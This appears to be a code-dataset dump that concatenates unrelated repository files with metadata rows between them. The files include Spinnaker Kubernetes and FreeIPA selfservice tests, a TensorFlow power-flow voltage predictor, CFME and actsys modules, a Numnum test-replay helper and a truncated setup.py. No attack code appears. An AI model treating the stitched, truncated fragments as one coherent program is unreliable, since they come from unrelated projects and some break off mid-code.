(builder.new_clause_builder('Deployment created',
retryable_for_secs=60)
.get_resources(
'deploy',
extra_args=[deployment_name, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.deployment_configmap_mounted_predicate(configmap_name)))
return st.OperationContract(
self.new_post_operation(
title='Deploy manifest', data=payload,
path='pipelines/' + self.TEST_APP + '/' + pipeline_name),
contract=builder.build())
def deploy_deployment_with_docker_artifact(self, image):
"""Creates OperationContract for deploying and substituting one image into
a Deployment object
To verify the operation, we just check that the deployment was created with
the correct image.
"""
bindings = self.bindings
name = self.TEST_APP + '-deployment'
image_name = 'placeholder'
docker_artifact = self.__docker_image_artifact(image_name, image)
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'cloudProvider': 'kubernetes',
'moniker': {
'app': self.TEST_APP
},
'account': bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'source': 'text',
'type': 'deployManifest',
'user': '[anonymous]',
'manifests': [self.mf.deployment(name, image_name)],
'artifacts': [docker_artifact]
}],
description='Deploy manifest',
application=self.TEST_APP)
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('Deployment created',
retryable_for_secs=15)
.get_resources(
'deploy',
extra_args=[name, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.deployment_image_predicate(image)))
return st.OperationContract(
self.new_post_operation(
title='deploy_manifest', data=payload, path='tasks'),
contract=builder.build())
def delete_kind(self, kind, version=None):
"""Creates OperationContract for deleteManifest
To verify the operation, we just check that the Kubernetes deployment
is no longer visible (or is in the process of terminating).
"""
bindings = self.bindings
name = self.TEST_APP + '-' + kind
payload = self.agent.make_json_payload_from_kwargs(
job=[{
'cloudProvider': 'kubernetes',
'type': 'deleteManifest',
'account': bindings['SPINNAKER_KUBERNETES_V2_ACCOUNT'],
'user': '[anonymous]',
'kinds': [ kind ],
'location': self.TEST_NAMESPACE,
'options': { },
'labelSelectors': {
'selectors': [{
'kind': 'EQUALS',
'key': 'app',
'values': [ self.TEST_APP ]
}]
}
}],
application=self.TEST_APP,
description='Destroy Manifest')
if version is not None:
name = name + '-' + version
builder = kube.KubeContractBuilder(self.kube_v2_observer)
(builder.new_clause_builder('Manifest Removed')
.get_resources(
kind,
extra_args=[name, '--namespace', self.TEST_NAMESPACE])
.EXPECT(self.mp.not_found_observation_predicate()))
return st.OperationContract(
self.new_post_operation(
title='delete_kind', data=payload, path='tasks'),
contract=builder.build())
class KubeV2ArtifactTest(st.AgentTestCase):
"""The test fixture for the KubeV2ArtifactTest.
This is implemented using citest OperationContract instances that are
created by the KubeV2ArtifactTestScenario.
"""
# pylint: disable=missing-docstring
@property
def scenario(self):
return citest.base.TestRunner.global_runner().get_shared_data(
KubeV2ArtifactTestScenario)
def test_a_create_app(self):
self.run_test_case(self.scenario.create_app())
def test_b1_deploy_deployment_with_docker_artifact(self):
self.run_test_case(self.scenario.deploy_deployment_with_docker_artifact('library/nginx'))
def test_b2_update_deployment_with_docker_artifact(self):
self.run_test_case(self.scenario.deploy_deployment_with_docker_artifact('library/redis'))
def test_b3_delete_deployment(self):
self.run_test_case(self.scenario.delete_kind('deployment'), max_retries=2)
def test_c1_create_config_map(self):
self.run_test_case(self.scenario.deploy_config_map('v000'))
def test_c2_noop_update_config_map(self):
self.run_test_case(self.scenario.deploy_config_map('v000'))
def test_c3_update_config_map(self):
self.run_test_case(self.scenario.deploy_config_map('v001'))
def test_c4_delete_configmap(self):
self.run_test_case(self.scenario.delete_kind('configmap', version='v001'), max_retries=2)
def test_d1_create_unversioned_configmap(self):
self.run_test_case(self.scenario.deploy_unversioned_config_map('1'))
def test_d2_update_unversioned_configmap(self):
self.run_test_case(self.scenario.deploy_unversioned_config_map('2'))
def test_d3_delete_unversioned_configmap(self):
self.run_test_case(self.scenario.delete_kind('configmap'), max_retries=2)
def test_e1_create_deployment_with_versioned_configmap(self):
self.run_test_case(self.scenario.deploy_deployment_with_config_map(True))
def test_e2_delete_deployment(self):
self.run_test_case(self.scenario.delete_kind('deployment'), max_retries=2)
def test_e3_delete_configmap(self):
self.run_test_case(self.scenario.delete_kind('configmap', version='v000'), max_retries=2)
def test_f1_create_configmap_deployment_pipeline(self):
self.run_test_case(self.scenario.save_configmap_deployment_pipeline('deploy-configmap-deployment'))
def test_f2_execute_configmap_deployment_pipeline(self):
self.run_test_case(self.scenario.execute_deploy_manifest_pipeline('deploy-configmap-deployment'))
def test_f3_delete_deployment(self):
self.run_test_case(self.scenario.delete_kind('deployment'), max_retries=2)
def test_f4_delete_configmap(self):
self.run_test_case(self.scenario.delete_kind('configmap', version='v000'), max_retries=2)
def test_z_delete_app(self):
# Give a total of a minute because it might also need
# an internal cache update
self.run_test_case(self.scenario.delete_app(),
retry_interval_secs=8, max_retries=8)
def main():
"""Implements the main method running this artifact test."""
defaults = {
'TEST_STACK': 'tst',
'TEST_APP': 'kubv2arti' + KubeV2ArtifactTestScenario.DEFAULT_TEST_ID
}
return citest.base.TestRunner.main(
parser_inits=[KubeV2ArtifactTestScenario.initArgumentParser],
default_binding_overrides=defaults,
test_case_list=[KubeV2ArtifactTest])
if __name__ == '__main__':
sys.exit(main())
| apache-2.0 | 2,528,857,640,949,448,000 | 35.116773 | 103 | 0.648698 | false |
tbabej/freeipa | ipatests/test_xmlrpc/test_selfservice_plugin.py | 1 | 9394 | # Authors:
# Rob Crittenden <[email protected]>
#
# Copyright (C) 2010 Red Hat
# see file 'COPYING' for use and warranty information
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Test the `ipalib/plugins/selfservice.py` module.
"""
from ipalib import errors
from ipatests.test_xmlrpc.xmlrpc_test import Declarative
import pytest
selfservice1 = u'testself'
invalid_selfservice1 = u'bad+name'
@pytest.mark.tier1
class test_selfservice(Declarative):
cleanup_commands = [
('selfservice_del', [selfservice1], {}),
]
tests = [
dict(
desc='Try to retrieve non-existent %r' % selfservice1,
command=('selfservice_show', [selfservice1], {}),
expected=errors.NotFound(
reason=u'ACI with name "%s" not found' % selfservice1),
),
dict(
desc='Try to update non-existent %r' % selfservice1,
command=('selfservice_mod', [selfservice1],
dict(permissions=u'write')),
expected=errors.NotFound(
reason=u'ACI with name "%s" not found' % selfservice1),
),
dict(
desc='Try to delete non-existent %r' % selfservice1,
command=('selfservice_del', [selfservice1], {}),
expected=errors.NotFound(
reason=u'ACI with name "%s" not found' % selfservice1),
),
dict(
desc='Search for non-existent %r' % selfservice1,
command=('selfservice_find', [selfservice1], {}),
expected=dict(
count=0,
truncated=False,
summary=u'0 selfservices matched',
result=[],
),
),
# Note that we add postalCode but expect postalcode. This tests
# the attrs normalizer.
dict(
desc='Create %r' % selfservice1,
command=(
'selfservice_add', [selfservice1], dict(
attrs=[u'street', u'c', u'l', u'st', u'postalcode'],
permissions=u'write',
)
),
expected=dict(
value=selfservice1,
summary=u'Added selfservice "%s"' % selfservice1,
result=dict(
attrs=[u'street', u'c', u'l', u'st', u'postalcode'],
permissions=[u'write'],
selfaci=True,
aciname=selfservice1,
),
),
),
dict(
desc='Try to create duplicate %r' % selfservice1,
command=(
'selfservice_add', [selfservice1], dict(
attrs=[u'street', u'c', u'l', u'st', u'postalcode'],
permissions=u'write',
),
),
expected=errors.DuplicateEntry(),
),
dict(
desc='Retrieve %r' % selfservice1,
command=('selfservice_show', [selfservice1], {}),
expected=dict(
value=selfservice1,
summary=None,
result={
'attrs': [u'street', u'c', u'l', u'st', u'postalcode'],
'permissions': [u'write'],
'selfaci': True,
'aciname': selfservice1,
},
),
),
dict(
desc='Retrieve %r with --raw' % selfservice1,
command=('selfservice_show', [selfservice1], {'raw':True}),
expected=dict(
value=selfservice1,
summary=None,
result={
'aci': u'(targetattr = "street || c || l || st || postalcode")(version 3.0;acl "selfservice:testself";allow (write) userdn = "ldap:///self";)',
},
),
),
dict(
desc='Search for %r' % selfservice1,
command=('selfservice_find', [selfservice1], {}),
expected=dict(
count=1,
truncated=False,
summary=u'1 selfservice matched',
result=[
{
'attrs': [u'street', u'c', u'l', u'st', u'postalcode'],
'permissions': [u'write'],
'selfaci': True,
'aciname': selfservice1,
},
],
),
),
dict(
desc='Search for %r with --pkey-only' % selfservice1,
command=('selfservice_find', [selfservice1], {'pkey_only' : True}),
expected=dict(
count=1,
truncated=False,
summary=u'1 selfservice matched',
result=[
{
'aciname': selfservice1,
},
],
),
),
dict(
desc='Search for %r with empty attrs and permissions' % selfservice1,
command=('selfservice_find', [selfservice1], {'attrs' : None, 'permissions' : None}),
expected=dict(
count=1,
truncated=False,
summary=u'1 selfservice matched',
result=[
{
'attrs': [u'street', u'c', u'l', u'st', u'postalcode'],
'permissions': [u'write'],
'selfaci': True,
'aciname': selfservice1,
},
],
),
),
dict(
desc='Search for %r with --raw' % selfservice1,
command=('selfservice_find', [selfservice1], {'raw':True}),
expected=dict(
count=1,
truncated=False,
summary=u'1 selfservice matched',
result=[
{
'aci': u'(targetattr = "street || c || l || st || postalcode")(version 3.0;acl "selfservice:testself";allow (write) userdn = "ldap:///self";)'
},
],
),
),
dict(
desc='Update %r' % selfservice1,
command=(
'selfservice_mod', [selfservice1], dict(permissions=u'read')
),
expected=dict(
value=selfservice1,
summary=u'Modified selfservice "%s"' % selfservice1,
result=dict(
attrs=[u'street', u'c', u'l', u'st', u'postalcode'],
permissions=[u'read'],
selfaci=True,
aciname=selfservice1,
),
),
),
dict(
desc='Retrieve %r to verify update' % selfservice1,
command=('selfservice_show', [selfservice1], {}),
expected=dict(
value=selfservice1,
summary=None,
result={
'attrs': [u'street', u'c', u'l', u'st', u'postalcode'],
'permissions': [u'read'],
'selfaci': True,
'aciname': selfservice1,
},
),
),
dict(
desc='Try to update %r with empty permissions' % selfservice1,
command=(
'selfservice_mod', [selfservice1], dict(permissions=None)
),
expected=errors.RequirementError(name='permissions'),
),
dict(
desc='Retrieve %r to verify invalid update' % selfservice1,
command=('selfservice_show', [selfservice1], {}),
expected=dict(
value=selfservice1,
summary=None,
result={
'attrs': [u'street', u'c', u'l', u'st', u'postalcode'],
'permissions': [u'read'],
'selfaci': True,
'aciname': selfservice1,
},
),
),
dict(
desc='Delete %r' % selfservice1,
command=('selfservice_del', [selfservice1], {}),
expected=dict(
result=True,
value=selfservice1,
summary=u'Deleted selfservice "%s"' % selfservice1,
)
),
dict(
desc='Create invalid %r' % invalid_selfservice1,
command=(
'selfservice_add', [invalid_selfservice1], dict(
attrs=[u'street', u'c', u'l', u'st', u'postalcode'],
permissions=u'write',
)
),
expected=errors.ValidationError(name='name',
error='May only contain letters, numbers, -, _, and space'),
),
]
| gpl-3.0 | -2,524,740,462,012,965,000 | 31.171233 | 166 | 0.459016 | false |
interpss/DeepMachineLearning | ipss.dml/py/single_net_random/predict_voltage_random_learningCuve.py | 1 | 3720 | '''
Copyright (C) 2005-17 www.interpss.org
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
Use NN-model to predict the bus voltage for a set of scale-factors
'''
from datetime import datetime
import numpy as np
import tensorflow as tf
import sys
sys.path.insert(0, '..')
import lib.common_func as cf
train_points = 1000
#
# load the IEEE-14Bus case
#
filename = 'testdata/ieee14.ieee'
noBus, noBranch = cf.ipss_app.loadCase(filename, 'BusVoltLoadChangeRandomTrainCaseBuilder')
print(filename, ' loaded, no of Buses, Branches:', noBus, ', ', noBranch)
# define model size
size = noBus * 2
#print('size: ', size)
# define model variables
W1 = tf.Variable(tf.zeros([size,size]))
b1 = tf.Variable(tf.zeros([size]))
# define model
def nn_model(data):
output = tf.matmul(data, W1) + b1
return output
# define loss
x = tf.placeholder(tf.float32, [None, size])
y = tf.placeholder(tf.float32)
error = tf.square(nn_model(x) - y)
loss = tf.reduce_sum(error)
# define training optimization
optimizer = tf.train.AdagradOptimizer(0.3)
train = optimizer.minimize(loss)
init = tf.global_variables_initializer()
tf.summary.histogram('y',y)
tf.summary.histogram('x',x)
tf.summary.scalar('loss',loss)
merged_summary_op = tf.summary.merge_all()
# run the computation graph
with tf.Session() as sess :
sess.run(init)
summary_writer = tf.summary.FileWriter('D://logs//1',sess.graph)
# run the training part
# =====================
print('Begin training: ', datetime.now())
# retrieve training set
trainSet = cf.ipss_app.getTrainSet(train_points)
train_x, train_y = cf.transfer2PyArrays(trainSet)
train_x,aver_x,ran_x = cf.normalization(train_x);
train_y,aver_y,ran_y = cf.normalization(train_y);
# run the training part
for i in range(cf.train_steps):
summary_str = sess.run(merged_summary_op,{x:train_x, y:train_y})
summary_writer.add_summary(summary_str, i)
if (i % 1000 == 0) : print('Training step: ', i)
sess.run(train, {x:train_x, y:train_y})
print('End training: ', datetime.now())
'''
print('W1: ', sess.run(W1))
print('b1: ', sess.run(b1))
'''
# run the verification part
# =========================
testSize=100
mismatchSet = np.zeros((testSize,2))
# retrieve a test case
for i in range(testSize) :
#for factor in [0.45, 1.0, 1.55] :
testCase = cf.ipss_app.getTestCase()
test_x, test_y = cf.transfer2PyArrays(testCase)
test_x = np.divide(np.subtract(test_x,aver_x),ran_x)
# compute model output (network voltage)
model_y = sess.run(nn_model(x), {x:test_x})
#printArray(model_y, 'model_y')
netVoltage = cf.transfer2JavaDblAry(model_y[0]*ran_y+aver_y, size)
mismatchSet[i] = np.array([cf.ipss_app.getMismatch(netVoltage)[0],cf.ipss_app.getMismatch(netVoltage)[1]])
train_m,aver_m,ran_m = cf.normalization(mismatchSet);
print('model out mismatch(aver): ', aver_m)
print('model out mismatch(range): ', ran_m)
| apache-2.0 | 6,591,949,553,571,193,000 | 29.525424 | 114 | 0.633602 | false |
intel-ctrlsys/actsys | actsys/control/commands/bios/bios_version.py | 1 | 1059 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2017 Intel Corp.
#
"""
Get BIOS version
"""
from ...commands.command import CommandResult
from ...plugin import DeclarePlugin
from .bios import BiosCommand
@DeclarePlugin('bios_version', 100)
class BiosVersionCommand(BiosCommand):
"""Bios Get Version Command"""
def __init__(self, device_name, configuration, plugin_manager, logger=None):
"""Retrieve dependencies and prepare for power on"""
BiosCommand.__init__(self, device_name, configuration, plugin_manager, logger)
def execute(self):
"""Execute the command"""
try:
self.setup()
result = []
result_dict = self.node_controller.get_version(self.device_data, self.bmc_data)
for key, value in result_dict.items():
command_result = CommandResult(0, value)
command_result.device_name = key
result.append(command_result)
except Exception as ex:
return [CommandResult(255, str(ex))]
return result
| apache-2.0 | -7,822,982,988,380,406,000 | 31.090909 | 91 | 0.623229 | false |
RedHatQE/cfme_tests | cfme/services/service_catalogs/__init__.py | 1 | 3979 | import importscan
import sentaku
from widgetastic.utils import deflatten_dict
from widgetastic.utils import Parameter
from widgetastic.utils import ParametrizedLocator
from widgetastic.utils import ParametrizedString
from widgetastic.widget import ParametrizedView
from widgetastic.widget import Select
from widgetastic.widget import Text
from widgetastic.widget import View
from widgetastic_patternfly import BootstrapSelect
from widgetastic_patternfly import Input
from cfme.common import Taggable
from cfme.exceptions import ItemNotFound
from cfme.utils.appliance import Navigatable
from cfme.utils.update import Updateable
from cfme.utils.wait import TimedOutError
class ServiceCatalogs(Navigatable, Taggable, Updateable, sentaku.modeling.ElementMixin):
"""
Service Catalogs main class to context switch between ui
and ssui. All the below methods are implemented in both ui
and ssui side .
"""
order = sentaku.ContextualMethod()
add_to_shopping_cart = sentaku.ContextualMethod()
def __init__(self, appliance, catalog=None, name=None, stack_data=None,
dialog_values=None, ansible_dialog_values=None):
Navigatable.__init__(self, appliance=appliance)
self.catalog = catalog
self.name = name
self.stack_data = stack_data
self.dialog_values = dialog_values
self.ansible_dialog_values = ansible_dialog_values
self.parent = self.appliance.context
class BaseOrderForm(View):
"""Represents the order form of a service.
This form doesn't have a static set of elements apart from titles and buttons. In the most cases
the fields can be either regular inputs or dropdowns. Their locators depend on field names. In
order to find and fill required fields a parametrized view is used here. The keys of a fill
dictionary should match ids of the fields. For instance there is a field with such html
<input id="some_key"></input>, so a fill dictionary should look like that:
{"some_key": "some_value"}
"""
title = Text('#explorer_title_text')
dialog_title = Text(".//div[@id='main_div']//h2")
@ParametrizedView.nested
class fields(ParametrizedView): # noqa
PARAMETERS = ("key",)
input = Input(id=Parameter("key"))
select = Select(id=Parameter("key"))
param_input = Input(id=ParametrizedString("param_{key}"))
dropdown = BootstrapSelect(locator=ParametrizedLocator(
".//div[contains(@class, 'bootstrap-select')]/select[@id={key|quote}]/.."))
param_dropdown = BootstrapSelect(locator=ParametrizedLocator(
".//div[contains(@class, 'bootstrap-select')]/select[@id='param_{key}']/.."))
@property
def visible_widget(self):
for widget in (self.input, self.dropdown, self.param_input,
self.param_dropdown, self.select):
try:
widget.wait_displayed('2s')
return widget
except TimedOutError:
pass
else:
raise ItemNotFound("Visible widget is not found")
def read(self):
return self.visible_widget.read()
def fill(self, value):
return self.visible_widget.fill(value)
def fill(self, fill_data):
values = deflatten_dict(fill_data)
was_change = False
self.before_fill(values)
for key, value in values.items():
widget = self.fields(key)
if value is None:
self.logger.debug('Skipping fill of %r because value was None', key)
continue
try:
if widget.fill(value):
was_change = True
except NotImplementedError:
continue
self.after_fill(was_change)
return was_change
from . import ui, ssui # NOQA last for import cycles
importscan.scan(ui)
importscan.scan(ssui)
| gpl-2.0 | -2,037,682,114,986,794,200 | 37.259615 | 100 | 0.656195 | false |
chmcewan/Numnum | src/Numnum.py | 1 | 14131 | import numpy as np
import numpy.matlib
import scipy as sp
import scipy.io as sio
import inspect
import pdb
from numbers import Number
import warnings
import pdb
singleton = None
class Result:
def __init__(this, name, passes=0, total=0):
this.name = name
this.passes = float(passes)
this.total = float(total)
def __iadd__(this, that):
this.passes = this.passes + that.passes
this.total = this.total + that.total
return this
def passed(this):
return this.passes == this.total
def __repr__(this):
fr = 0.0
if this.total > 0:
fr = this.passes / this.total
return "%s: %d%% pass (%d/%d)" % (this.name, round(fr*100.0), this.passes, this.total )
class Numnum:
def __init__(this):
this.idxn = 0
this.idxu = 0
this.ids = {}
this.ctx = []
this.gid = 0
this.state = {}
this.mode = 0
this.unit = 0
this.run = None
this.depth = 0
def push(this):
""" push new context onto stack """
name = caller(1)
if name in this.ids:
this.ids[name] = this.ids[name] + 1
else:
this.ids[name] = 1
ctx = {}
ctx["name"] = name
ctx["run"] = this.ids[name]
this.ctx.append(ctx)
def pop(this):
""" pop context off of stack """
ctx = this.ctx.pop()
if this.mode > 0:
if ctx["name"] not in this.state:
this.state[ctx["name"]] = []
runs = this.state[ctx["name"]]
if ctx["run"] == len(runs)+1:
runs.append(ctx)
else:
raise Exception("wtf: %d ~ %d" % (ctx["run"] , len(runs)))
# this.state[ctx.name] = runs
def validate(this, str, *args):
ctx = this.ctx[-1]
if this.mode > 0:
ctx[str] = args
else:
funs = this.state[ctx["name"]]
if type(funs) != list:
funs = [funs]
fun = funs[ ctx["run"] - 1 ]
vals = fun[str]
this._validate(vals, *args)
# this.ctx{end} = ctx;
def _validate(this, vals, *args):
if len(vals) != len(args):
warnings.warn("Unequal number of values: %d != %d" % (len(vals)/2, len(args)/2), stacklevel=3)
# Assume lost trailing arguments are optional
for i in range(0, min(len(args), len(vals)), 2):
key_a = args[i]
val_a = args[i+1]
key_b = vals[i]
val_b = vals[i+1]
equivalent(val_a, val_b, key_a, key_b)
def parse(obj):
ans = obj
if type(obj) == dict:
for key in ans:
ans[key] = parse(ans[key])
elif isinstance(obj, sio.matlab.mio5_params.mat_struct):
ans = {}
for key in obj._fieldnames:
ans[key] = parse(obj.__dict__[key])
elif isinstance(obj,np.ndarray):
if obj.dtype == np.dtype('O'):
# cell-array, otherwise leave alone. Assumes 1D.
ans = []
for item in obj:
ans.append(parse(item))
return ans
def str2func(name, offset=0):
scope = inspect.stack()[1+offset][0].f_globals
if name in scope:
return scope[name]
else:
for s in scope:
if inspect.ismodule(scope[s]):
# print("str2func recursing into '%s'" % s)
for m in inspect.getmembers(scope[s]):
if m[0] == name:
return m[1]
def get_instance():
global singleton
if singleton == None:
singleton = Numnum()
return singleton
def named_args(kv):
v = []
for i in range(0, len(kv), 2):
v.append(kv[i+1])
return v
def unnamed_args(k):
v = []
if type(k) == np.ndarray or type(k) == list:
for i in range(0, len(k)):
v.append(k[i+1])
else:
v.append(k)
return v
def replay(filename, mode=0):
this = get_instance()
this.idxn = 0
this.idxu = 0
this.ids = {}
this.ctx = []
this.gid = 0
this.state = parse(sio.loadmat(filename, chars_as_strings=True, struct_as_record=False, squeeze_me=True))
this.mode = -1
this.unit = 1
this.run = None
this.depth = 0
testname = None
if type(mode) == str:
testname = mode
mode = -1
# print(filename)
test_results = {}
# run integration test
if mode == 0 or mode > 0:
f = str2func(this.state["numnum_function"], 1)
v = unnamed_args(this.state["numnum_varargin"])
f(*v)
print("integration %s: pass" % this.state["numnum_function"])
# run unit tests
if mode == 0 or mode < 0:
total_tests = 0
for key in this.state.keys():
if testname and (testname != key):
continue
if not( key.startswith("numnum_") or key.startswith("_") ):
runs = this.state[key]
f = str2func(key, 1)
if f == None:
print('Skipping %s...\n' % key)
continue
if type(runs) != list:
runs = [runs]
passes = 0
for j in range(0, len(runs)):
run = runs[j]
arg = named_args(run["arg"])
ret = named_args(run["ret"])
this.mode = 0 # disable verification in functions...
this.run = run # ...except top-level
this.depth = 0
this.unit = 1 # keep random generation enabled
this.idxn = 0 # reset random numbers
this.idxu = 0
try:
# Invoke. Return values validated internally.
f( *arg )
passes = passes + 1
except Exception as e:
print(e.message)
print(filename)
pass
#raise
this.mode = -1
this.run = None
this.depth = 0
#total_tests = total_tests + 1
#try:
# if len(ret) == 1:
# equivalent( ret[0], results, run["ret"][0], run["ret"][0] )
# else:
# for k in range(0, len(ret)):
# equivalent( ret[k], results[k], run["ret"][2*k], run["ret"][2*k] )
# passes = passes + 1;
#except Exception as e:
# print(e.message)
# pass
#errstr= "%s: %d%% pass (%d/%d)" % (run["name"], round(float(passes)/float(len(runs))*100.0), passes, len(runs) )
#print(errstr)
#if passes != len(runs):
# raise Exception(errstr)
#assert passes == len(runs)
test_results[key] = Result( key, passes, len(runs) )
#if total_tests == 0:
# raise Exception("No unit tests found");
return test_results
def record(filename, f, *args):
this = get_instance()
this.idxn = 0
this.idxu = 0
this.ids = {}
this.ctx = []
this.gid = 0
this.state = {}
this.mode = 1
this.unit = 0
this.run = None
this.depth = 0
n = 10000
this.state["numnum_randn"] = np.random.standard_normal((1, n))
this.state["numnum_rand"] = np.random.random( (1, n) )
this.state["numnum_function"] = "" # FIXME
this.state["numnum_varargin"] = args
f(*args)
sio.savemat(filename, this.state)
def caller(offset=0):
return inspect.stack()[2+offset][3]
def arguments(*args):
this = get_instance()
this.depth = this.depth + 1
if this.mode:
this.push()
this.validate('arg', *args)
elif this.run and this.depth == 1:
this._validate(this.run['arg'], *args)
def returns(*args):
this = get_instance()
this.depth = this.depth - 1
if this.mode:
this.validate('ret', *args)
this.pop()
elif this.run and this.depth == 0:
this._validate(this.run['ret'], *args)
def values(*args):
this = get_instance()
if this.mode:
this.validate('val', *args)
elif this.run and this.depth == 1:
this._validate(this.run['val'], *args)
# Reproducible deterministic random number generation
def randn(r, c):
this = get_instance()
v = np.random.standard_normal((r, c))
if this.mode or this.unit:
idx = 0 # needs to be deterministic for unit tests
for i in range(0, r):
for j in range(0, c):
v[i,j] = this.state["numnum_randn"][ idx % this.state["numnum_randn"].shape[0] ]
idx = idx + 1
return v
# Reproducible deterministic random number generation
def rand(r, c):
this = get_instance()
v = np.random.random((r, c))
if this.mode or this.unit:
idx = 0 # needs to be deterministic for unit tests
for i in range(0, r):
for j in range(0, c):
v[i,j] = this.state["numnum_rand"][ idx % this.state["numnum_rand"].shape[0] ]
idx = idx + 1
return v
# Reproducible deterministic random number generation
def randperm(n):
this = get_instance()
v = randperm(n)
if this.mode or this.unit:
# FIXME: slow and dumb...
raise Exception('Not implemented')
# Fix handling of 1d ndarrays
def insist(v, rows, cols):
if rows == 0 and cols == 0:
raise Exception("Both rows and cols connot be zero")
if type(v) == float:
v = np.ones(shape=(1,1), dtype=np.float64) * v
if type(v) == int:
v = np.ones(shape=(1,1), dtype=np.float64) * float(v)
if rows == 0:
rows = v.size / cols
if cols == 0:
cols = v.size / rows
if v.ndim == 1:
v = v.reshape( ( rows , cols) )
# TODO: is this ever desirable?
elif (v.shape[0] != v.shape[1]) and v.shape[0] == cols and v.shape[1] == rows:
warnings.warn("Implicit use of transpose")
v = v.T
assert v.shape[1] == cols
assert v.shape[0] == rows
return v
def equivalent(a, b, A = "a", B = "b"):
olda = a
oldb = b
if type(a) == type(None):
warnings.warn("Ignoring null (return?) value for '%s'" % A)
return
if isinstance(a,np.bool_) and not isinstance(b,np.bool_):
if a:
a = 1
else:
a = 0
if isinstance(a,Number):
a = np.ones( (1,1) ).reshape((1,1)) * float(a)
if isinstance(b,Number):
b = np.ones( (1,1) ).reshape((1,1)) * float(b)
if type(a) != type(b):
# check if scalar before complaining
if type(a) == np.ndarray and len(a.shape):
if a.shape[0] == 1:
if len(a.shape) == 1:
a0 = a[0]
else:
a0 = a[0,0]
if float(a0) == float(b):
return
elif type(a) == list and type(b) == np.ndarray:
pass
elif isinstance(a,Number) and type(b) == np.ndarray:
# Compare a scalar with an array: start by converting
# a to a length-1 list
a = [a]
else:
raise Exception("class(%s) = %s and class(%s) = %s" % (A, type(a), B, type(b)))
if type(a) == np.ndarray:
# Meh. Fix up shapes
if len(a.shape) == 1 and len(b.shape) == 2:
if b.shape[0] == 1:
a = a.reshape( (1, a.shape[0]) )
elif b.shape[1] == 1:
a = a.reshape( (a.shape[0], 1) )
if len(b.shape) == 1 and len(a.shape) == 2:
if a.shape[0] == 1:
b = b.reshape( (1, b.shape[0]) )
elif a.shape[1] == 1:
b = b.reshape( (b.shape[0], 1) )
if len(a.shape) == 1 and len(b.shape) == 1:
a = a.reshape( (a.shape[0], 1) )
b = b.reshape( (b.shape[0], 1) )
if b.shape[1] == 0:
pdb.set_trace()
b = np.ones((1,1)).resize((1,1)) * float(b)
if a.shape != b.shape:
raise Exception("size(%s) = %dx%d and size(%s) = %dx%d" % (A, a.shape[0], a.shape[1], B, b.shape[0], b.shape[1]))
delta = np.abs(a-b)
chk = delta > 1e-6
if chk.any():
errstr = "%s ~= %s\n%s\n%s" % (A, B, str(a), str(b))
raise Exception(errstr)
elif type(a) == dict:
for k in a.keys():
equivalent(a[k], b[k], A = "%s.%s" % (A, k), B = "%s.%s" % (B, k))
elif type(a) == list:
if len(a) != len(b):
raise Exception("len(%s) = %i and len(%s) = %i" % (A, len(a), B, len(b)))
for i in range(0, min(len(a), len(b))):
equivalent(a[i], b[i], A = "%s[%d]" % (A, i), B = "%s[%s]" % (B, i))
# raise Exception("Cannot check equivalence of %s (%s) and %s (%s)" % (A, type(a), B, type(b) ))
| mit | -7,945,160,460,626,821,000 | 29.759551 | 129 | 0.445262 | false |
vlegoff/tsunami | src/primaires/objet/types/viande.py | 1 | 1887 | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le type viande."""
from .nourriture import Nourriture
class Viande(Nourriture):
"""Type d'objet: viande.
"""
nom_type = "viande"
def __init__(self, cle=""):
"""Constructeur de l'objet"""
Nourriture.__init__(self, cle)
self.nourrissant = 3
| bsd-3-clause | -6,479,407,128,384,047,000 | 40.933333 | 79 | 0.743508 | false |
WardBenjamin/FRCBuild | setup.py | 1 | 1637 | """
CLI Tool for building FIRST Robotics (FRC) C++ projects w/ WPILib
"""
from setuptools import find_packages, setup
dependencies = ['click']
setup(
name='frcbuild',
version='0.1.0',
url='https://github.com/WardBenjamin/frc-build',
license='BSD',
author='Benjamin Ward',
author_email='[email protected]',
